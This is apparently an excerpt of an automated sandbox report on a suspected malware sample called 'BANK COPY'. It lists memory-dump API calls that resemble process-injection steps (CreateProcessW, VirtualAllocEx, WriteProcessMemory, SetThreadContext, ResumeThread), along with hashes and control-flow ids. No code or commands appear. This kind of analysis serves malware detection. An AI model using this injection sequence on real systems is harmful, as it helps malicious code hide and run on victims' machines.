                                                                                                    • Opcode ID: e89ad2239487c07d18751c168a17e3d2d07ced7339df09dabf20b22978ca9443
                                                                                                    • Instruction ID: 0634c9861c0079be19b8fa5cb76d5e3e53f9bdf0260bb00b5a42bd15a7d65865
                                                                                                    • Opcode Fuzzy Hash: e89ad2239487c07d18751c168a17e3d2d07ced7339df09dabf20b22978ca9443
                                                                                                    • Instruction Fuzzy Hash: 4A51E875D00329DFDB61CF99C884BDDBBB2BF48314F14809AE848A7250DB716A89CF61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 381 8021658-80216e3 383 80216e5-80216eb 381->383 384 80216ee-80216f5 381->384 383->384 385 8021700-8021716 384->385 386 80216f7-80216fd 384->386 387 8021721-80217be CreateProcessW 385->387 388 8021718-802171e 385->388 386->385 390 80217c0-80217c6 387->390 391 80217c7-802183b 387->391 388->387 390->391 399 802184d-8021854 391->399 400 802183d-8021843 391->400 401 8021856-8021865 399->401 402 802186b 399->402 400->399 401->402 404 802186c 402->404 404->404
                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 080217AB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0
                                                                                                    • Opcode ID: 498482437564dc36420dcf09769c50e0d6f99010b82c543ebfe0dce98a0046fa
                                                                                                    • Instruction ID: 3745c8662f28feec6393bded1de73c2087d49f10000982c2f2333d14597b9423
                                                                                                    • Opcode Fuzzy Hash: 498482437564dc36420dcf09769c50e0d6f99010b82c543ebfe0dce98a0046fa
                                                                                                    • Instruction Fuzzy Hash: 8651F871D00329DFDB60CF99C880BDDBBB6BF48314F14809AE808A7250DB716A89CF61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 562 8021bf8-8021c51 564 8021c53-8021c5f 562->564 565 8021c61-8021c9a WriteProcessMemory 562->565 564->565 566 8021ca3-8021cc4 565->566 567 8021c9c-8021ca2 565->567 567->566
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08021C8D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: 29177b5ed0de5bbe3a560ba4230a5f59212d19e2987fb76b445debc3d5aee43a
                                                                                                    • Instruction ID: e365f6f8114899baccf3a2dbc91491d7ac3a23e013226c9bf447346f0bc2e261
                                                                                                    • Opcode Fuzzy Hash: 29177b5ed0de5bbe3a560ba4230a5f59212d19e2987fb76b445debc3d5aee43a
                                                                                                    • Instruction Fuzzy Hash: 9E2134B5900259DFCB10CF9AC885BDEBBF5FF48310F10802AE918A7750D778AA54CBA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 575 8021c00-8021c51 577 8021c53-8021c5f 575->577 578 8021c61-8021c9a WriteProcessMemory 575->578 577->578 579 8021ca3-8021cc4 578->579 580 8021c9c-8021ca2 578->580 580->579
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08021C8D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: ab971b34b968bfa7aa181e638d35566f2b5fed1c0d36954a37f4e048b4d7ae72
                                                                                                    • Instruction ID: 6ffd802a599720a0cf97d7b158c6f59de4ecec0ff39f0510c7d8b1882de319c4
                                                                                                    • Opcode Fuzzy Hash: ab971b34b968bfa7aa181e638d35566f2b5fed1c0d36954a37f4e048b4d7ae72
                                                                                                    • Instruction Fuzzy Hash: 622112B5900259DFCB10CF9AC885BDEBBF5FF48310F10842AE918A3750D778A954CBA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 569 2ada4dc-2adc134 DuplicateHandle 571 2adc13d-2adc15a 569->571 572 2adc136-2adc13c 569->572 572->571
                                                                                                    APIs
                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02ADC066,?,?,?,?,?), ref: 02ADC127
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.284410430.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DuplicateHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 3793708945-0
                                                                                                    • Opcode ID: 6a47fc997119df8ff01816f127ab8e9838a91535fc34b994dee9f80d14297f55
                                                                                                    • Instruction ID: cc3fcc68487dad163a2596e1c6f4462405ff2c67a947dd37059f827c4cf99fc8
                                                                                                    • Opcode Fuzzy Hash: 6a47fc997119df8ff01816f127ab8e9838a91535fc34b994dee9f80d14297f55
                                                                                                    • Instruction Fuzzy Hash: C721E4B5900218AFDB10CF99D984BDEFBF5FB48324F54801AE915A7710D774A954CFA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 582 2adc099-2adc09b 583 2adc0a0-2adc134 DuplicateHandle 582->583 584 2adc13d-2adc15a 583->584 585 2adc136-2adc13c 583->585 585->584
                                                                                                    APIs
                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02ADC066,?,?,?,?,?), ref: 02ADC127
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.284410430.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DuplicateHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 3793708945-0
                                                                                                    • Opcode ID: f54c9e0c519aea1282b72faeb3d398fc32194480512e317bfa6908d70033019d
                                                                                                    • Instruction ID: 494092afdbefec905a3c95006bd37b2be0ca00a1d59cf29438d2a0cc50097595
                                                                                                    • Opcode Fuzzy Hash: f54c9e0c519aea1282b72faeb3d398fc32194480512e317bfa6908d70033019d
                                                                                                    • Instruction Fuzzy Hash: B121E3B5900218AFDB10CF99D985ADEFBF5FB48324F14801AE915A3710D374A955CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 588 80219c0-80219c5 589 80219c7-8021a08 588->589 590 8021a0a-8021a14 588->590 589->590 592 8021a20-8021a4c SetThreadContext 590->592 593 8021a16-8021a1e 590->593 594 8021a55-8021a76 592->594 595 8021a4e-8021a54 592->595 593->592 595->594
                                                                                                    APIs
                                                                                                    • SetThreadContext.KERNELBASE(?,00000000), ref: 08021A3F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1591575202-0
                                                                                                    • Opcode ID: 0de83ea9fef51c3018a8efaef1eb1ad1538f34bd8f9175c523c5659fd72b0191
                                                                                                    • Instruction ID: 04784cecc19e8283952014841ddcba4f247771ba21c48f186d56a2b0cdcef8c8
                                                                                                    • Opcode Fuzzy Hash: 0de83ea9fef51c3018a8efaef1eb1ad1538f34bd8f9175c523c5659fd72b0191
                                                                                                    • Instruction Fuzzy Hash: 972156B1E002199FDB00CF99C5857EEFBF4BB08210F04812AD418F3740D778A9458FA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08021B07
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1726664587-0
                                                                                                    • Opcode ID: 5a4c7ef0da5f2178b532a2f55b4de11c16e498fbe8922dbc0ddce69e9deb3c0d
                                                                                                    • Instruction ID: d172197a700493acbc4d29aaaeb195a4aacc052c5e0e46983656bdde69c0d3e7
                                                                                                    • Opcode Fuzzy Hash: 5a4c7ef0da5f2178b532a2f55b4de11c16e498fbe8922dbc0ddce69e9deb3c0d
                                                                                                    • Instruction Fuzzy Hash: 3E21F3B6900259DFCB10CF99D985BDEBBF5BB48310F14842AE518A7610D374A954CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08021B07
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1726664587-0
                                                                                                    • Opcode ID: 3ff551dbd05e9454cf9c50ceb5e687a432a8f3b14f472e9a18b49a5ebb53e7e7
                                                                                                    • Instruction ID: fc33fe9c805b88625c7d61e1d14e88b9a159d8a1bdffee7222116e296ee4c837
                                                                                                    • Opcode Fuzzy Hash: 3ff551dbd05e9454cf9c50ceb5e687a432a8f3b14f472e9a18b49a5ebb53e7e7
                                                                                                    • Instruction Fuzzy Hash: 5F21F3B1900259DFCB10CF9AD884BDEFBF8FB48310F10842AE918A3610D374A954CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SetThreadContext.KERNELBASE(?,00000000), ref: 08021A3F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1591575202-0
                                                                                                    • Opcode ID: 6d5ddbfbfc25072105f1107b9926e3776a9a1598d742964ee16b5e37ae2b1bf3
                                                                                                    • Instruction ID: df77fff379a795157f5078f19b574cfa2c1653abe8e40335bde7a5bda4ce6179
                                                                                                    • Opcode Fuzzy Hash: 6d5ddbfbfc25072105f1107b9926e3776a9a1598d742964ee16b5e37ae2b1bf3
                                                                                                    • Instruction Fuzzy Hash: A22106B1D002199FDB10CF9AC9857DEFBF4BB48224F54816AD418B3740D778A9548FA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02AD9A49,00000800,00000000,00000000), ref: 02AD9C5A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.284410430.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: e45f00ce102084e886d35394164d3fd3958c2f1deae12a2fe46c8c893e31f24e
                                                                                                    • Instruction ID: fa1b8a02286bf90b619ca8c01b95857a4a6905edcf0a3ef6da46bff3156b6b6a
                                                                                                    • Opcode Fuzzy Hash: e45f00ce102084e886d35394164d3fd3958c2f1deae12a2fe46c8c893e31f24e
                                                                                                    • Instruction Fuzzy Hash: DE1114B69002099FCB10CF9AD484BDFFBF4EB88324F10842ED51AA7600C775A945CFA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02AD9A49,00000800,00000000,00000000), ref: 02AD9C5A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.284410430.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: 5f4dabd0cda7bf85379a6cc9ec15563be2cee04c276d4c2f82a1e553f01cdaef
                                                                                                    • Instruction ID: 4a684b80bfe237d0cbf2add7b805becd034e8adf878a931d2794e11f7d6ee6bd
                                                                                                    • Opcode Fuzzy Hash: 5f4dabd0cda7bf85379a6cc9ec15563be2cee04c276d4c2f82a1e553f01cdaef
                                                                                                    • Instruction Fuzzy Hash: CD1103B69002099FCB10CF9AD884BDFFBF4EB88324F14842AE41AA7600C774A545CFA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 075BBFDB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProtectVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 544645111-0
                                                                                                    • Opcode ID: af46a9330417a14ac18055f63682041c5730ba97ebb3b976360f307accae0558
                                                                                                    • Instruction ID: 76e549710a78b05033ffdee1cbf0d2b410821e7bcbc910449d925ab32d1c25cf
                                                                                                    • Opcode Fuzzy Hash: af46a9330417a14ac18055f63682041c5730ba97ebb3b976360f307accae0558
                                                                                                    • Instruction Fuzzy Hash: 372114B59002499FCB10CF9AC885BDEFBF4FF48320F10842AE458A7650D378AA45CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08021BC3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: b6cba3d9f4e9684ee5cf391a978dea843d99684ec2119abf31adb32e89053901
                                                                                                    • Instruction ID: 222b402b8bfe6e8d304d62607954c2ef62246dec4776936eacd82ff296a9f358
                                                                                                    • Opcode Fuzzy Hash: b6cba3d9f4e9684ee5cf391a978dea843d99684ec2119abf31adb32e89053901
                                                                                                    • Instruction Fuzzy Hash: F61155B5900208DFCB10CF99C884BDEBBF8FF48320F208419E529A7610C374A944CFA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08021BC3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 163d95e704056c99820bb3de52fc1c670c0e4ebf65b41e7aee762b45e89045f1
                                                                                                    • Instruction ID: 0d520cff5161bc32923a3e024975c2a5244f2986358444bf8197d091c16a1e0e
                                                                                                    • Opcode Fuzzy Hash: 163d95e704056c99820bb3de52fc1c670c0e4ebf65b41e7aee762b45e89045f1
                                                                                                    • Instruction Fuzzy Hash: E51110B5900249DFCB10DF9AD884BDEBBF8EB88324F108419E529A7610C375A954CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02AD99CE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.284410430.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 4139908857-0
                                                                                                    • Opcode ID: 140130219e50e2927dc5eafba4d8dfb96906a7a03318cc6da57cd5c359b76cbc
                                                                                                    • Instruction ID: 3c3fcc9674f4d9616e2e2c7a623f357b31c4e852432b778b7e193121ffe75ad2
                                                                                                    • Opcode Fuzzy Hash: 140130219e50e2927dc5eafba4d8dfb96906a7a03318cc6da57cd5c359b76cbc
                                                                                                    • Instruction Fuzzy Hash: D211DFB6D002498FCB20CF9AD484BDFFBF4AF88228F14842AD459A7610C779A545CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 0802278D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePost
                                                                                                    • String ID:
                                                                                                    • API String ID: 410705778-0
                                                                                                    • Opcode ID: 3a725cd791ddb7df923b286633773ca8c5ccabcb61d054092b5cf937bb1e5451
                                                                                                    • Instruction ID: f5f4728201a9933210a7b250b0f85412638ff464780b683591f7bff0dfcbce97
                                                                                                    • Opcode Fuzzy Hash: 3a725cd791ddb7df923b286633773ca8c5ccabcb61d054092b5cf937bb1e5451
                                                                                                    • Instruction Fuzzy Hash: C311F2B58002499FCB20DF99D889BDEFBF8EB48324F14841AE515A7600C374A944CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 0802278D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePost
                                                                                                    • String ID:
                                                                                                    • API String ID: 410705778-0
                                                                                                    • Opcode ID: 2d54243e779d24bcbbb42c02ce16986d0aab11c0e501e3a6e73c886daf6c9c1a
                                                                                                    • Instruction ID: b5a9d2ff1977944ac50aa187f143e196e00695fe30c8cb92c2f304b0838b74e3
                                                                                                    • Opcode Fuzzy Hash: 2d54243e779d24bcbbb42c02ce16986d0aab11c0e501e3a6e73c886daf6c9c1a
                                                                                                    • Instruction Fuzzy Hash: 7D11E2B5900349DFDB10DF99D889BDEFBF8EB48324F20841AE515A7600C375A994CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: 17b31d19bea953a2fd32a9e6ab0a70466f95f36608552f08ae3109f444dbb0d1
                                                                                                    • Instruction ID: eaa36d10a2af18b1c10fe4cd456336d3da67b50ac44e99b22fe368c040099e63
                                                                                                    • Opcode Fuzzy Hash: 17b31d19bea953a2fd32a9e6ab0a70466f95f36608552f08ae3109f444dbb0d1
                                                                                                    • Instruction Fuzzy Hash: 791100B5900249CFCB10CF99D985BDEBBF4EB48224F20841AD519B7600C378A945CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: 50135755ae0a40215694bfea7611d2163fcf8be189d482a1b2a26a70ffae5a39
                                                                                                    • Instruction ID: a951da1c02810fbf638a9141b3702186025f4ccf19eee6ad5a1d8116a7c30c1c
                                                                                                    • Opcode Fuzzy Hash: 50135755ae0a40215694bfea7611d2163fcf8be189d482a1b2a26a70ffae5a39
                                                                                                    • Instruction Fuzzy Hash: 5B1112B1900249CFCB10DF9AD885BDEFBF8EB49324F20841AD519A7700C775A944CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.282812375.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e0d000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 00e23cc2a4c0ab1c24386436fe8f0dffd0f78dddd6cedae9ef4e2684dc617819
                                                                                                    • Instruction ID: 635019f0f490033b2e73a62e4e4d077590ce97291e1554fba040302b1aca09ba
                                                                                                    • Opcode Fuzzy Hash: 00e23cc2a4c0ab1c24386436fe8f0dffd0f78dddd6cedae9ef4e2684dc617819
                                                                                                    • Instruction Fuzzy Hash: 742107B1508240DFDB15DF90DCC0B66BF75FB94328F24C569E8096B686C336E896C7A2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.283510007.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_111d000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d1a611265501f3f7041685b784216c538fa42f05597bd196915bede7936b6f6f
                                                                                                    • Instruction ID: 916950fe70305e930602b55e57b368e8ae530a97b6bbf2d58ca3cb3686f072ee
                                                                                                    • Opcode Fuzzy Hash: d1a611265501f3f7041685b784216c538fa42f05597bd196915bede7936b6f6f
                                                                                                    • Instruction Fuzzy Hash: 5721F571504240DFDF09DF94E9C4B66FBA5FB84324F24C67DE8094B64AC336D846CA62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.283510007.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_111d000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dcc543750f6d508f8c23c5967a3b4d5dd6d94aab595ff4e40cebbeb1449e030e
                                                                                                    • Instruction ID: 0391e416f9832dfb06d98038067b1fe0cc0ea6137cf81af690b853fa0c86ed13
                                                                                                    • Opcode Fuzzy Hash: dcc543750f6d508f8c23c5967a3b4d5dd6d94aab595ff4e40cebbeb1449e030e
                                                                                                    • Instruction Fuzzy Hash: 2221D075504240DFDF19DF54E8C8B26FB65FB84354F24C5BDD8094B64AC33AD84ACAA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.282812375.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e0d000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8fbef4a1e70deff03197093d81f521a6a7c6ef6ce65c584de2f463e24d10b77d
                                                                                                    • Instruction ID: 96ec9a8fb1236755268e26787bd3baabdef6506a19a63d882ab4cbed658c5245
                                                                                                    • Opcode Fuzzy Hash: 8fbef4a1e70deff03197093d81f521a6a7c6ef6ce65c584de2f463e24d10b77d
                                                                                                    • Instruction Fuzzy Hash: 0111E676404280DFCF12CF50D9C4B16BF71FB94324F24C6A9D8495B656C336E896CBA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.283510007.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_111d000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b12f6e5284a8006670de04e8acf0eae73a3b637b28784ce6af087747e0efce52
                                                                                                    • Instruction ID: 6e3145e28c61d88ddbbe87454957ea1f95efd8ff9c2e6b1763162a129c47b51f
                                                                                                    • Opcode Fuzzy Hash: b12f6e5284a8006670de04e8acf0eae73a3b637b28784ce6af087747e0efce52
                                                                                                    • Instruction Fuzzy Hash: 0B11BE75504280CFDB16CF14E5C4B16FB61FB84314F24C6A9D8094B65AC33AD44ACB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.283510007.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_111d000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b12f6e5284a8006670de04e8acf0eae73a3b637b28784ce6af087747e0efce52
                                                                                                    • Instruction ID: c80fb330e14a5f2624ae79f4acbae3ddf9551c48271dee584d4c9e12432cd64c
                                                                                                    • Opcode Fuzzy Hash: b12f6e5284a8006670de04e8acf0eae73a3b637b28784ce6af087747e0efce52
                                                                                                    • Instruction Fuzzy Hash: F011BB75904280DFDF06CF54E5C4B55FBB1FB84224F28C6A9D8494B65AC33AD84ACB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
